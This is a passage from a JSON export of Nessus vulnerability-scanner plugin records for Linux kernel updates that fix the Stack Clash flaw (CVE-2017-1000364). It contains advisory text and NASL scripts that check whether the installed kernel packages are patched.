redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-420.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-420.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:10", "description": "Security Fix(es) :\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n (CVE-2017-1000364, Important)", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20170619) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170619_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/100906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100906);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20170619) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on the\n system. This is a kernel-side mitigation which increases\n the stack guard gap size from one page to 1 MiB to make\n successful exploitation of this issue more difficult.\n (CVE-2017-1000364, Important)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1706&L=scientific-linux-errata&F=&S=&P=4893\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3355ae8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.21.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.21.2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:27", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too small and could be 'jumped over' by userland programs using more than one page of stack in functions and so lead to memory corruption. This update extends the stack guard page to 1 MB (for 4k pages) and 16 MB (for 64k pages) to reduce this attack vector. This is not a kernel bugfix, but a hardening measure against this kind of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1615-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1615-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1615-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100914);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1615-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too\n small and could be 'jumped over' by userland programs\n using more than one page of stack in functions and so\n lead to memory corruption. This update extends the stack\n guard page to 1 MB (for 4k pages) and 16 MB (for 64k\n pages) to reduce this attack vector. This is not a\n kernel bugfix, but a hardening measure against this kind\n of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171615-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?36e34779\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-996=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-996=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-996=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-996=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_45-default-1-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_45-xen-1-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.74-60.64.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.74-60.64.45.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:41", "description": "This update for the Linux Kernel 3.12.61-52_72 fixes one issue. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1939-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_72-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_72-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1939-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101942", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1939-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101942);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1939-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_72 fixes one issue. The\nfollowing security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171939-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9302f77d\"\n );\n 